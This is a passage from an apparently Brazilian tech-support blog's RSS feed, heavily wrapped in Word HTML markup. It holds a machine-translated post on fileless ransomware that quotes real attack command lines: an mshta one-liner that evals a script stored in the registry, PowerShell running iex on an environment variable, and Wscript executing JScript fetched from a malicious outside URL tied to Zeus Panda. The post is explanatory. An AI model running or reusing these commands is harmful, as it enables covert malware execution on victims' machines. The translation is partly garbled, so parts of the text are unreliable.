instruções detalhadas sobre como agir nestes casos,&amp;nbsp;&lt;/span&gt;vale a pena olhar o site de suporte da Microsoft&lt;a href=&quot;https://www.blogger.com/null&quot;&gt;. (https://support.microsoft.com/pt-br/help/4049094/windows-devices-may-fail-to-boot-after-installing-october-10-version-o)&lt;/a&gt;</description><link>http://computersservicetecnica.blogspot.com/2017/10/atualizacao-do-windows-causa-tela-azul.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcE-rRVmu_cHQSxsmn8tBL4ZhjYh5tUQ0WmrokMc0MyOChkvEuS25vLLkygCE3hPJ1PJEbAdRk69mBbuq3ZhbXCDPM7XVd5aL01AoY-lV5-svRG3m7Ded5ScZP8x_FUSYY2ShtG2u2gOY/s72-c/tela+da+morte.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-7707621943090040675</guid><pubDate>Sat, 15 Jul 2017 03:34:00 +0000</pubDate><atom:updated>2017-07-15T00:34:02.471-03:00</atom:updated><title></title><description>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 18.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Infecções
sem arquivo - o último truque de Ransomware&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Se
alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é
apenas o começo.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Todos os anos, à medida
que são pagos mais resgates, os cibercriminosos têm mais capital para investir
em novas tecnologias e técnicas.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Uma de suas
técnicas mais promissoras é infecções sem arquivo ou ataques de script.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Historicamente,
o malware e agora o ransomware furtivamente um programa em um computador, e
então, abertamente ou secretamente, tentaram a execução desse arquivo.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;O tópico comum nesses ataques
é que um arquivo é baixado e, em seguida, tenta executar.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;A arquitetura do software antivírus emprega um driver de
sistema de arquivos.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Esse driver trava o arquivo
e depois determina se ele pode ser executado.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Um
malware sem arquivo não descarta um arquivo e ignora o driver do sistema de
arquivos do AV mainstream.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Em vez disso, os scripts são escritos e executados através de
conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript.&lt;/span&gt;
&lt;span class=&quot;notranslate&quot;&gt;Mostre e diga a hora.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
table.MsoTableGrid
 {mso-style-name:&quot;Tabela com grade&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 border:solid windowtext 1.0pt;
 mso-border-alt:solid windowtext .5pt;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-border-insideh:.5pt solid windowtext;
 mso-border-insidev:.5pt solid windowtext;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: rgb(217, 217, 217) none repeat scroll 0% 0%; border-collapse: collapse; border: medium none; height: 82px; width: 615px;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;mso-yfti-irow: 0; mso-yfti-lastrow: yes;&quot;&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 448.9pt;&quot; valign=&quot;top&quot; width=&quot;599&quot;&gt;
  &lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;C: \ WINDOWS \ system32 \
  mshta.exe &quot;javascript: QNm90c =&quot; 8YNUG &quot;;&lt;/span&gt; &lt;br /&gt;
  &lt;span class=&quot;notranslate&quot;&gt;S07R = novo ActiveXObject (&quot;WScript.Shell&quot;);&lt;/span&gt;
  &lt;span class=&quot;notranslate&quot;&gt;E91eHqEE = &quot;l&quot;;&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;L21MJb = S07R.RegRead (&quot;HKCU \\ software \\ lfxqiypm
  \\ qkkqsiqrqk&quot;);&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;G0dn1w =
  &quot;jSJKZ&quot;;&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Eval (l21MJb);&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;GQEXz2t = &quot;apyD&quot;; &quot;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;O
comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo
Microsoft.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;O comando chama
Javascipt, que por sua vez chama Wscript para executar um script a partir de
uma chave de registro com caracteres aleatórios.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Uma vez que o script reside em uma chave de registro, não há
nenhum arquivo para o driver do sistema de arquivos para analisar.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
table.MsoTableGrid
 {mso-style-name:&quot;Tabela com grade&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 border:solid windowtext 1.0pt;
 mso-border-alt:solid windowtext .5pt;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-border-insideh:.5pt solid windowtext;
 mso-border-insidev:.5pt solid windowtext;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #D9D9D9; border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-border-insideh: .5pt solid windowtext; mso-border-insidev: .5pt solid windowtext; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 480;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;mso-yfti-irow: 0; mso-yfti-lastrow: yes;&quot;&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 448.9pt;&quot; valign=&quot;top&quot; width=&quot;599&quot;&gt;
  &lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;mso-ansi-language: EN-US;&quot;&gt;&quot;C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \
  powershell.exe&quot; iex $ env: kuihcdc&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;mso-ansi-language: EN-US;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;O
comando acima instrui o Powershell, outro mecanismo de script Microsoft válido,
para executar um script a partir de uma variável de ambiente com caracteres
aleatórios.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Uma vez que o script
reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de
arquivos tem visibilidade zero neste tipo de atividade.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
table.MsoTableGrid
 {mso-style-name:&quot;Tabela com grade&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 border:solid windowtext 1.0pt;
 mso-border-alt:solid windowtext .5pt;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-border-insideh:.5pt solid windowtext;
 mso-border-insidev:.5pt solid windowtext;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #D9D9D9; border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-border-insideh: .5pt solid windowtext; mso-border-insidev: .5pt solid windowtext; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 480;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;height: 50.25pt; mso-yfti-irow: 0; mso-yfti-lastrow: yes;&quot;&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; height: 50.25pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 448.9pt;&quot; valign=&quot;top&quot; width=&quot;599&quot;&gt;
  &lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;mso-ansi-language: EN-US;&quot;&gt;Wscript // B // E: JScript OTTYUADAF &quot;gexywoaxor&quot;
  &quot;http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;mso-ansi-language: EN-US;&quot;&gt;g5_U_kDbMAl19pucJOw6mF4&amp;amp;es_sm=140&amp;amp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;mso-ansi-language: EN-US;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;O
comando acima executa o Wscript, outro mecanismo de script Microsoft válido e,
em seguida, muda para o Javascript e executa o script diretamente de um site
com uma seqüência de consulta gnarly.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Vamos pensar sobre isso.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;O
comando acima está instruindo wscript a executar o código diretamente de um site
externo sem um arquivo atingindo o driver do sistema de arquivos.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Se
alguém faz uma pesquisa na estranha string &quot;gexywoaxor&quot;, descobre-se
que esse malware é um trojan bancário chamado Zeus Panda descoberto por
Forcepoint.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
